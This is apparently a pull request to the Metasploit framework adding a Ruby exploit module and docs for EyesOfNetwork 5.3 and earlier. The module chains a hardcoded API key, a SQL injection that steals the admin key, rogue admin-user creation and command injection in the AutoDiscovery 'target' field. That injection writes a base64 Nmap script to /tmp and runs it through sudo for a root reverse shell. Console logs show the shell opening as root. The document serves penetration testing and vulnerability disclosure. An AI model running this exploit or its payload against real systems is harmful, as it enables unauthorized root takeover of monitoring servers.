### PR TITLE
Add module and docs for EyesOfNetwork 5.3 RCE (CVE-2020-8654, 8655, 8656, 8657)

### DIFF
--- a/documentation/modules/exploit/linux/http/eyesofnetwork_autodiscovery_rce.md
+++ b/documentation/modules/exploit/linux/http/eyesofnetwork_autodiscovery_rce.md
@@ -42,7 +42,7 @@ Module options (exploit/linux/http/eyesofnetwork_autodiscovery_rce):
    Name         Current Setting  Required  Description
    ----         ---------------  --------  -----------
    Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOSTS       192.168.91.139   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RHOSTS       192.168.1.1     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
    RPORT        443              yes       The target port (TCP)
    SERVER_ADDR                   yes       EyesOfNetwork server IP address (if different from RHOST)
    SSL          true             no        Negotiate SSL/TLS for outgoing connections
@@ -54,7 +54,7 @@ Payload options (generic/shell_reverse_tcp):
 
    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
-   LHOST  192.168.91.130   yes       The listen address (an interface may be specified)
+   LHOST  192.168.1.2     yes       The listen address (an interface may be specified)
    LPORT  4444             yes       The listen port
 
 
@@ -67,11 +67,11 @@ Exploit target:
 
 msf5 exploit(linux/http/eyesofnetwork_autodiscovery_rce) > exploit
 
-[*] Started reverse TCP handler on 192.168.91.130:4444 
+[*] Started reverse TCP handler on 192.168.1.2:4444 
 [*] Using generated API key: a496fb1025187066dc1e4e56197bd2db1a23c565f42b98df8ff55698442b6476
 [+] Authenticated as user kY7Qn1gr8L
 [*] Sending payload (428 bytes) ...
-[*] Command shell session 1 opened (192.168.91.130:4444 -> 192.168.91.139:45897) at 2020-02-19 15:30:31 +0200
+[*] Command shell session 1 opened (192.168.1.2:4444 -> 192.168.1.1:45897) at 2020-02-19 15:30:31 +0100
 
 id
 uid=0(root) gid=0(root) groups=0(root)

--- a/documentation/modules/exploit/linux/http/eyesofnetwork_autodiscovery_rce.md
+++ b/documentation/modules/exploit/linux/http/eyesofnetwork_autodiscovery_rce.md
@@ -1,4 +1,4 @@
-## Introduction
+## Vulnerable Application
 This module exploits multiple vulnerabilities in EyesOfNetwork version 5.3 and prior in order to execute arbitrary commands as root.
 
 The module first exploits a hardcoded admin API key in EyesOfNetwork API version 2.4.2 (CVE-2020-8657) in order to generate a valid access token and use it to create a new user with admin privileges. If the generated key is not valid, the admin API key is obtained via an SQL injection vulnerability affecting the same API version (CVE-2020-8656).
@@ -8,7 +8,6 @@ Next, the module authenticates as the newly created user in order to abuse a com
 The module only works with HTTPS, so SSL is enabled by default. Valid credentials for a user with administrative privileges are required. However, this module can bypass authentication via two methods, i.e. by generating an API access token based on a hardcoded key, and via SQLI. This module has been successfully tested on EyesOfNetwork 5.3 with API version 2.4.2.
 
 ## Verification Steps
-
 1. Install the module as usual
 2. Start msfconsole
 3. Do: `use exploit/linux/http/eyesofnetwork_autodiscovery_rce`
@@ -18,22 +17,9 @@ The module only works with HTTPS, so SSL is enabled by default. Valid credential
 7. Do: `exploit`
 
 ## Options
-
-1.  `Proxies`. This option is not set by default.
-2.  `RHOSTS`. To use: `set RHOSTS [IP]`
-3.  `RPORT`. The default setting is `443`. To use: `set RPORT [PORT]`
-4.  `SERVER_ADDR`. This option is not set by default.
-5.  `SSL`. The default setting is `true`, because HTTPS is required for the module to work.
-6.  `TARGETURI`. This option is the base path. `/` by default.
-7.  `VHOST`. This option is not set by default.
-
-## Payload Options
-1. `LHOST`. To use: `set LHOST [IP]`
-2. `LPORT`. The default setting is `4444`. To use: `set LPORT [PORT]`
-
+1. `SERVER_ADDR`. This option should be set in case the EyesOfNetwork server IP address is different from RHOST. This because the EON server IP is needed to generate the API key.
 
 ## Scenarios
-
 ```
 msf5 exploit(linux/http/eyesofnetwork_autodiscovery_rce) > show options
 
@@ -42,7 +28,7 @@ Module options (exploit/linux/http/eyesofnetwork_autodiscovery_rce):
    Name         Current Setting  Required  Description
    ----         ---------------  --------  -----------
    Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOSTS       192.168.1.1     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RHOSTS       192.168.1.1      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
    RPORT        443              yes       The target port (TCP)
    SERVER_ADDR                   yes       EyesOfNetwork server IP address (if different from RHOST)
    SSL          true             no        Negotiate SSL/TLS for outgoing connections
@@ -54,7 +40,7 @@ Payload options (generic/shell_reverse_tcp):
 
    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
-   LHOST  192.168.1.2     yes       The listen address (an interface may be specified)
+   LHOST  192.168.1.2      yes       The listen address (an interface may be specified)
    LPORT  4444             yes       The listen port
 
 

--- a/documentation/modules/exploit/linux/http/eyesofnetwork_autodiscovery_rce.md
+++ b/documentation/modules/exploit/linux/http/eyesofnetwork_autodiscovery_rce.md
@@ -1,4 +1,4 @@
-## Introduction
+## Vulnerable Application
 This module exploits multiple vulnerabilities in EyesOfNetwork version 5.3 and prior in order to execute arbitrary commands as root.
 
 The module first exploits a hardcoded admin API key in EyesOfNetwork API version 2.4.2 (CVE-2020-8657) in order to generate a valid access token and use it to create a new user with admin privileges. If the generated key is not valid, the admin API key is obtained via an SQL injection vulnerability affecting the same API version (CVE-2020-8656).

--- a/modules/exploits/linux/http/eyesofnetwork_autodiscovery_rce.md
+++ b/modules/exploits/linux/http/eyesofnetwork_autodiscovery_rce.md
@@ -1,0 +1,84 @@
+## Introduction
+This module exploits multiple vulnerabilities in EyesOfNetwork version 5.3 and prior in order to execute arbitrary commands as root.
+
+The module first exploits a hardcoded admin API key in EyesOfNetwork API version 2.4.2 (CVE-2020-8657) in order to generate a valid access token and use it to create a new user with admin privileges. If the generated key is not valid, the admin API key is obtained via an SQL injection vulnerability affecting the same API version (CVE-2020-8656).
+
+Next, the module authenticates as the newly created user in order to abuse a command injection vulnerability in the `target` parameter of the AutoDiscovery functionality within the EON web interface (CVE-2020-8654). Specifically, it writes an Nmap NSE script containing the payload to disk, and then activates this script by launching an Nmap host discovery scan against the target. This approach achieves privilege escalation because the default sudo configuration permits the 'apache' user to execute Nmap as root (CVE-2020-8655).
+
+The module only works with HTTPS, so SSL is enabled by default. Valid credentials for a user with administrative privileges are required. However, this module can bypass authentication via two methods, i.e. by generating an API access token based on a hardcoded key, and via SQLI. This module has been successfully tested on EyesOfNetwork 5.3 with API version 2.4.2.
+
+## Verification Steps
+
+1. Install the module as usual
+2. Start msfconsole
+3. Do: `use exploit/linux/http/eyesofnetwork_autodiscovery_rce`
+4. Do: `set RHOSTS [IP]`
+5. Do: `set payload [payload]`
+6. Do: `set LHOST [IP]`
+7. Do: `exploit`
+
+## Options
+
+1.  `Proxies`. This option is not set by default.
+2.  `RHOSTS`. To use: `set RHOSTS [IP]`
+3.  `RPORT`. The default setting is `443`. To use: `set RPORT [PORT]`
+4.  `SERVER_ADDR`. This option is not set by default.
+5.  `SSL`. The default setting is `true`, because HTTPS is required for the module to work.
+6.  `TARGETURI`. This option is the base path. `/` by default.
+7.  `VHOST`. This option is not set by default.
+
+## Payload Options
+1. `LHOST`. To use: `set LHOST [IP]`
+2. `LPORT`. The default setting is `4444`. To use: `set LPORT [PORT]`
+
+
+## Scenarios
+
+```
+msf5 exploit(linux/http/eyesofnetwork_autodiscovery_rce) > show options
+
+Module options (exploit/linux/http/eyesofnetwork_autodiscovery_rce):
+
+   Name         Current Setting  Required  Description
+   ----         ---------------  --------  -----------
+   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS       192.168.91.139   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT        443              yes       The target port (TCP)
+   SERVER_ADDR                   yes       EyesOfNetwork server IP address (if different from RHOST)
+   SSL          true             no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI    /                yes       Base path to EyesOfNetwork
+   VHOST                         no        HTTP server virtual host
+
+
+Payload options (generic/shell_reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.91.130   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Auto
+
+
+msf5 exploit(linux/http/eyesofnetwork_autodiscovery_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.91.130:4444 
+[*] Using generated API key: a496fb1025187066dc1e4e56197bd2db1a23c565f42b98df8ff55698442b6476
+[+] Authenticated as user kY7Qn1gr8L
+[*] Sending payload (428 bytes) ...
+[*] Command shell session 1 opened (192.168.91.130:4444 -> 192.168.91.139:45897) at 2020-02-19 15:30:31 +0200
+
+id
+uid=0(root) gid=0(root) groups=0(root)
+```
+## References
+1. <https://www.exploit-db.com/exploits/48025>
+2. <https://nvd.nist.gov/vuln/detail/CVE-2020-8654>
+3. <https://nvd.nist.gov/vuln/detail/CVE-2020-8655>
+4. <https://nvd.nist.gov/vuln/detail/CVE-2020-8656>
+5. <https://nvd.nist.gov/vuln/detail/CVE-2020-8657>

--- a/modules/exploits/linux/http/eyesofnetwork_autodiscovery_rce.rb
+++ b/modules/exploits/linux/http/eyesofnetwork_autodiscovery_rce.rb
@@ -103,13 +103,14 @@ class MetasploitModule < Msf::Exploit::Remote
     # Attempt to obtain the admin API key via SQL injection, using a fake password and its md5 encrypted hash
     fake_pass = Rex::Text::rand_text_alpha(10)
     fake_pass_md5 = Digest::MD5.hexdigest("#{fake_pass}")
+    user_sqli = "' union select 1,'admin','#{fake_pass_md5}',0,0,1,1,8 or '"
     api_res = send_request_cgi({
       'uri'       => normalize_uri(target_uri.path, "/eonapi/getApiKey"),
       'method'    => 'GET',
       'User-Agent' => 'Mozilla/5.0 (Windows NT 1.0; WOW64; rv:13.37) Gecko/20200104 Firefox/13.37',
       'vars_get' => {
-        'username'   => "%27%20union%20select%201,%27admin%27,%27#{fake_pass_md5}%27,0,0,1,1,8%20or%20%27",
-        'password'   => "#{fake_pass}"
+        'username'   => user_sqli,
+        'password'   => fake_pass
       },
     })
 

--- a/modules/exploits/linux/http/eyesofnetwork_autodiscovery_rce.rb
+++ b/modules/exploits/linux/http/eyesofnetwork_autodiscovery_rce.rb
@@ -1,0 +1,329 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'            => 'EyesOfNetwork AutoDiscovery Target Command Execution',
+      'Description'     => %q{
+        This module exploits multiple vulnerabilities in EyesOfNetwork version 5.3
+        and prior in order to execute arbitrary commands as root.
+
+        This module takes advantage of a command injection vulnerability in the
+        `target` parameter of the AutoDiscovery functionality within the EON web
+        interface in order to write an Nmap NSE script containing the payload to
+        disk. It then starts an Nmap scan to activate the payload. This results in
+        privilege escalation because the`apache` user can execute Nmap as root.
+
+        Valid credentials for a user with administrative privileges are required.
+        However, this module can bypass authentication via two methods, i.e. by
+        generating an API access token based on a hardcoded key, and via SQLI.
+        This module has been successfully tested on EyesOfNetwork 5.3 with API
+        version 2.4.2.
+      },
+      'License'         => MSF_LICENSE,
+      'Author'          =>
+        [
+          'Clément Billac', # @h4knet - Discovery and exploit
+          'bcoles',         # Metasploit
+          'Erik Wynter'     # @wyntererik - Metasploit
+        ],
+      'References'      =>
+        [
+          ['CVE', '2020-8654'], # authenticated rce
+          ['CVE', '2020-8655'], # nmap privesc
+          ['CVE', '2020-8656'], # sqli auth bypass
+          ['CVE', '2020-8657'], # hardcoded API key
+          ['EDB', '48025'],
+        ],
+      'Platform'        => %w[unix linux],
+      'Arch'            => ARCH_CMD,
+      'Targets'         => [['Auto', { }]],
+      'Privileged'      => true,
+      'DisclosureDate'  => '2020-02-06',
+      'DefaultOptions'  => {
+        'RPORT' => 443,
+        'SSL'     => true, #HTTPS is required for the module to work
+        'PAYLOAD' => 'generic/shell_reverse_tcp'
+        },
+      'DefaultTarget'   => 0))
+    register_options [
+      OptString.new('TARGETURI', [true, 'Base path to EyesOfNetwork', '/']),
+      OptString.new('SERVER_ADDR', [true, 'EyesOfNetwork server IP address (if different from RHOST)', '']),
+    ]
+    register_advanced_options [
+      OptBool.new('ForceExploit',  [false, 'Override check result', false])
+    ]
+  end
+
+  def server_addr
+    datastore['SERVER_ADDR'].blank? ? rhost : datastore['SERVER_ADDR']
+  end
+
+  def check
+    vprint_status("Running check")
+    res = send_request_cgi 'uri' => normalize_uri(target_uri.path, '/eonapi/getApiKey')
+
+    unless res
+      return CheckCode::Unknown('Connection failed')
+    end
+
+    unless res.code == 401 && res.body.include?('api_version')
+      return CheckCode::Safe('Target is not an EyesOfNetwork application.')
+    end
+
+    version = res.get_json_document()['api_version'] rescue ''
+
+    if version.to_s.eql? ''
+      return CheckCode::Detected('Could not determine EyesOfNetwork version.')
+    end
+
+    version = Gem::Version.new version
+
+    unless version <= Gem::Version.new('2.4.2')
+      return CheckCode::Safe("Target is EyesOfNetwork with API version #{version}.")
+    end
+
+    CheckCode::Appears("Target is EyesOfNetwork with API version #{version}.")
+  end
+
+  def generate_api_key
+    default_key = "€On@piK3Y"
+    default_user_id = 1
+    key = Digest::MD5.hexdigest(default_key + default_user_id.to_s)
+    Digest::SHA256.hexdigest(key + server_addr)
+  end
+
+  def sqli_to_api_key
+    # Attempt to obtain the admin API key via SQL injection, using a fake password and its md5 encrypted hash
+    fake_pass = Rex::Text::rand_text_alpha(10)
+    fake_pass_md5 = Digest::MD5.hexdigest("#{fake_pass}")
+    api_res = send_request_cgi({
+      'uri'       => normalize_uri(target_uri.path, "/eonapi/getApiKey"),
+      'method'    => 'GET',
+      'User-Agent' => 'Mozilla/5.0 (Windows NT 1.0; WOW64; rv:13.37) Gecko/20200104 Firefox/13.37',
+      'vars_get' => {
+        'username'   => "%27%20union%20select%201,%27admin%27,%27#{fake_pass_md5}%27,0,0,1,1,8%20or%20%27",
+        'password'   => "#{fake_pass}"
+      },
+    })
+
+    unless api_res
+      print_error('Connection failed.')
+      return
+    end
+
+    unless api_res.code == 200 && api_res.get_json_document.include?('EONAPI_KEY')
+      print_error("SQL injection to obtain API key failed")
+      return
+    end
+
+    api_res.get_json_document()['EONAPI_KEY']
+  end
+
+  def create_eon_user(user, password, sqli)
+    vprint_status("Creating user #{user} ...")
+
+    vars_post = {
+      user_name:  user,
+      user_group: "admins",
+      user_password: password
+    }
+    res = send_request_cgi({
+      'method'   => 'POST',
+      'uri'      => normalize_uri(target_uri.path, '/eonapi/createEonUser'),
+      'ctype'    => 'application/json',
+      'vars_get' => {
+        'apiKey'   => @api_key,
+        'username' => @api_user
+      },
+      'data' => vars_post.to_json
+    })
+
+    unless res
+      print_warning("Failed to create user: Connection failed.")
+      return
+    end
+
+    unless res.code == 200 && res.get_json_document()['result']['description'].include?('SUCCESS')
+      if res.code == 401 && res.get_json_document()['status'].include?('unauthorized')
+        unless sqli == false
+          print_warning("Failed to create user using API key obtained via SQLI.")
+          return
+        end
+        print_warning("Failed to create user using generated API key.")
+        return "try_sqli"
+      else
+        return
+      end
+    end
+    return "success"
+  end
+
+  def delete_eon_user(user)
+    vprint_status "Removing user #{user} ..."
+
+    res = send_request_cgi({
+      'method'   => 'POST',
+      'uri'      => normalize_uri(target_uri.path, '/eonapi/deleteEonUser'),
+      'ctype'    => 'application/json',
+      'data'     => { user_name: user }.to_json,
+      'vars_get' => { apiKey: @api_key, username: @api_user }
+    })
+
+    unless res
+      print_warning 'Removing user #{user} failed: Connection failed'
+      return
+    end
+
+    res
+  end
+
+  def login(user, pass)
+    vprint_status "Authenticating as #{user} ..."
+
+    res = send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => normalize_uri(target_uri.path, 'login.php'),
+      'vars_post' => {
+        login: user,
+        mdp: pass
+      }
+    })
+
+    unless res
+      fail_with Failure::Unreachable, 'Connection failed'
+    end
+
+    unless res.code == 200 && res.body.include?('dashboard_view')
+      fail_with Failure::NoAccess, 'Authentication failed'
+    end
+
+    print_good "Authenticated as user #{user}"
+
+    @cookie = res.get_cookies
+
+    if @cookie.empty?
+      fail_with Failure::UnexpectedReply, 'Failed to retrieve cookies'
+    end
+
+    res
+  end
+
+  def create_autodiscovery_job(cmd)
+    vprint_status "Creating AutoDiscovery job: #{cmd}"
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => normalize_uri(target_uri.path, '/lilac/autodiscovery.php'),
+      'cookie' => @cookie,
+      'vars_post' => {
+        'request'          => 'autodiscover',
+        'job_name'         => 'Internal discovery',
+        'job_description'  => 'Internal EON discovery procedure.',
+        'nmap_binary'      => '/usr/bin/nmap',
+        'default_template' => '',
+        'target[]'         => cmd
+      }
+    })
+
+    unless res
+      fail_with Failure::Unreachable, 'Creating AutoDiscovery job failed: Connection failed'
+    end
+
+    unless res.body.include? 'Starting...'
+      fail_with Failure::Unknown, 'Creating AutoDiscovery job failed: Job failed to start'
+    end
+
+    res
+  end
+
+  def delete_autodiscovery_job(job_id)
+    vprint_status "Removing AutoDiscovery job #{job_id} ..."
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => normalize_uri(target_uri.path, '/lilac/autodiscovery.php'),
+      'cookie' => @cookie,
+      'vars_get' => {
+        id: job_id,
+        delete: 1
+      }
+    })
+
+    unless res
+      print_warning "Removing AutoDiscovery job #{job_id} failed: Connection failed"
+      return
+    end
+    res
+  end
+
+  def execute_command(cmd, opts = {})
+    res = create_autodiscovery_job ";#{cmd} #"
+    return unless res
+
+    job_id = res.body.scan(/autodiscovery.php\?id=([\d]+)/).flatten.first
+
+    if job_id.empty?
+      print_warning 'Could not retrieve AutoDiscovery job ID. Manual removal required.'
+      return
+    end
+    delete_autodiscovery_job job_id
+  end
+
+  def cleanup
+    super
+    if @username
+      delete_eon_user @username
+    end
+  end
+
+  def exploit
+    unless [CheckCode::Detected, CheckCode::Appears].include? check
+      unless datastore['ForceExploit']
+        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+      end
+      print_warning 'Target does not appear to be vulnerable'
+    end
+
+    @api_user = 'admin'
+    @api_key = generate_api_key
+    print_status "Using generated API key: #{@api_key}"
+
+    @username = rand_text_alphanumeric(8..12)
+    @password = rand_text_alphanumeric(8..12)
+    sqli = false
+    verify_api = create_eon_user @username, @password, sqli
+    unless verify_api == "success"
+      if verify_api == "try_sqli"
+        @api_key = sqli_to_api_key
+        unless @api_key
+          fail_with Failure::NoAccess, 'Failed to obtain valid API key'
+        end
+        sqli = true
+        print_status("Using API key obtained via SQL injection: #{@api_key}")
+        verify_api = create_eon_user @username, @password, sqli
+      else
+        fail_with Failure::NoAccess, 'Failed to obtain valid API key'
+      end
+    end
+
+    admin_group_id = 1
+    login @username, @password
+    unless @cookie.include? 'group_id='
+      @cookie << "; group_id=#{admin_group_id}"
+    end
+
+    nse = Base64.strict_encode64("local os=require \"os\" hostrule=function(host) os.execute(\"#{payload.encoded.gsub(/"/, '\"')}\") end action=function() end")
+    nse_path = "/tmp/.#{rand_text_alphanumeric 8..12}"
+    cmd = "echo #{nse} | base64 -d > #{nse_path};sudo /usr/bin/nmap localhost -sn -script #{nse_path};rm #{nse_path}"
+
+    print_status "Sending payload (#{cmd.length} bytes) ..."
+    execute_command cmd
+  end
+end

--- a/modules/exploits/linux/http/eyesofnetwork_autodiscovery_rce.rb
+++ b/modules/exploits/linux/http/eyesofnetwork_autodiscovery_rce.rb
@@ -39,7 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote
           ['CVE', '2020-8655'], # nmap privesc
           ['CVE', '2020-8656'], # sqli auth bypass
           ['CVE', '2020-8657'], # hardcoded API key
-          ['EDB', '48025'],
+          ['EDB', '48025']
         ],
       'Platform'        => %w[unix linux],
       'Arch'            => ARCH_CMD,
@@ -111,7 +111,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'vars_get' => {
         'username'   => user_sqli,
         'password'   => fake_pass
-      },
+      }
     })
 
     unless api_res
@@ -320,7 +320,7 @@ class MetasploitModule < Msf::Exploit::Remote
       @cookie << "; group_id=#{admin_group_id}"
     end
 
-    nse = Base64.strict_encode64("local os=require \"os\" hostrule=function(host) os.execute(\"#{payload.encoded.gsub(/"/, '\"')}\") end action=function() end")
+    nse = Rex::Text.encode_base64("local os=require \"os\" hostrule=function(host) os.execute(\"#{payload.encoded.gsub(/"/, '\"')}\") end action=function() end")
     nse_path = "/tmp/.#{rand_text_alphanumeric 8..12}"
     cmd = "echo #{nse} | base64 -d > #{nse_path};sudo /usr/bin/nmap localhost -sn -script #{nse_path};rm #{nse_path}"
 

--- a/modules/exploits/linux/http/eyesofnetwork_autodiscovery_rce.rb
+++ b/modules/exploits/linux/http/eyesofnetwork_autodiscovery_rce.rb
@@ -39,7 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote
           ['CVE', '2020-8655'], # nmap privesc
           ['CVE', '2020-8656'], # sqli auth bypass
           ['CVE', '2020-8657'], # hardcoded API key
-          ['EDB', '48025'],
+          ['EDB', '48025']
         ],
       'Platform'        => %w[unix linux],
       'Arch'            => ARCH_CMD,
@@ -59,6 +59,10 @@ class MetasploitModule < Msf::Exploit::Remote
     register_advanced_options [
       OptBool.new('ForceExploit',  [false, 'Override check result', false])
     ]
+  end
+
+  def nmap_path
+    '/usr/bin/nmap'
   end
 
   def server_addr
@@ -107,11 +111,10 @@ class MetasploitModule < Msf::Exploit::Remote
     api_res = send_request_cgi({
       'uri'       => normalize_uri(target_uri.path, "/eonapi/getApiKey"),
       'method'    => 'GET',
-      'User-Agent' => 'Mozilla/5.0 (Windows NT 1.0; WOW64; rv:13.37) Gecko/20200104 Firefox/13.37',
-      'vars_get' => {
+       'vars_get' => {
         'username'   => user_sqli,
         'password'   => fake_pass
-      },
+      }
     })
 
     unless api_res
@@ -227,7 +230,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'request'          => 'autodiscover',
         'job_name'         => 'Internal discovery',
         'job_description'  => 'Internal EON discovery procedure.',
-        'nmap_binary'      => '/usr/bin/nmap',
+        'nmap_binary'      => nmap_path,
         'default_template' => '',
         'target[]'         => cmd
       }
@@ -320,10 +323,9 @@ class MetasploitModule < Msf::Exploit::Remote
       @cookie << "; group_id=#{admin_group_id}"
     end
 
-    nse = Base64.strict_encode64("local os=require \"os\" hostrule=function(host) os.execute(\"#{payload.encoded.gsub(/"/, '\"')}\") end action=function() end")
+    nse = Rex::Text.encode_base64("local os=require \"os\" hostrule=function(host) os.execute(\"#{payload.encoded.gsub(/"/, '\"')}\") end action=function() end")
     nse_path = "/tmp/.#{rand_text_alphanumeric 8..12}"
-    cmd = "echo #{nse} | base64 -d > #{nse_path};sudo /usr/bin/nmap localhost -sn -script #{nse_path};rm #{nse_path}"
-
+    cmd = "echo #{nse} | base64 -d > #{nse_path};sudo #{nmap_path} localhost -sn -script #{nse_path};rm #{nse_path}"
     print_status "Sending payload (#{cmd.length} bytes) ..."
     execute_command cmd
   end


### PR DESCRIPTION
# About
This change adds a new module to /modules/exploits/linux/http/ that exploits multiple vulnerabilities in EyesOfNetwork version 5.3 and prior in order to execute arbitrary commands as root. The change also adds documentation for this module. The module is based on this exploit: [https://www.exploit-db.com/exploits/48025](url).

# Vulnerable System
EyesOfNetwork version 5.3 and prior.

# Verification Steps
1. Install the module as usual
2. Start msfconsole
3. Do: `use exploit/linux/http/eyesofnetwork_autodiscovery_rce`
4. Do: `set RHOSTS [IP]`
5. Do: `set payload [payload]`
6. Do: `set LHOST [IP]`
7. Do: `exploit`

# Options
1.  `Proxies`. This option is not set by default.
2.  `RHOSTS`. To use: `set RHOSTS [IP]`
3.  `RPORT`. The default setting is `443`. To use: `set RPORT [PORT]`
4.  `SERVER_ADDR`. This option is not set by default.
5.  `SSL`. The default setting is `true`, because HTTPS is required for the module to work.
6.  `TARGETURI`. This option is the base path. `/` by default.
7.  `VHOST`. This option is not set by default.

# Payload Options
1. `LHOST`. To use: `set LHOST [IP]`
2. `LPORT`. The default setting is `4444`. To use: `set LPORT [PORT]`

# Scenarios

```
msf5 exploit(linux/http/eyesofnetwork_autodiscovery_rce) > show options

Module options (exploit/linux/http/eyesofnetwork_autodiscovery_rce):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS       192.168.1.1      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT        443              yes       The target port (TCP)
   SERVER_ADDR                   yes       EyesOfNetwork server IP address (if different from RHOST)
   SSL          true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI    /                yes       Base path to EyesOfNetwork
   VHOST                         no        HTTP server virtual host


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.2      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Auto


msf5 exploit(linux/http/eyesofnetwork_autodiscovery_rce) > exploit

[*] Started reverse TCP handler on 192.168.1.2:4444 
[*] Using generated API key: a496fb1025187066dc1e4e56197bd2db1a23c565f42b98df8ff55698442b6476
[+] Authenticated as user kY7Qn1gr8L
[*] Sending payload (428 bytes) ...
[*] Command shell session 1 opened (192.168.1.2:4444 -> 192.168.1.1:45897) at 2020-02-19 15:30:31 +0100

id
uid=0(root) gid=0(root) groups=0(root)
```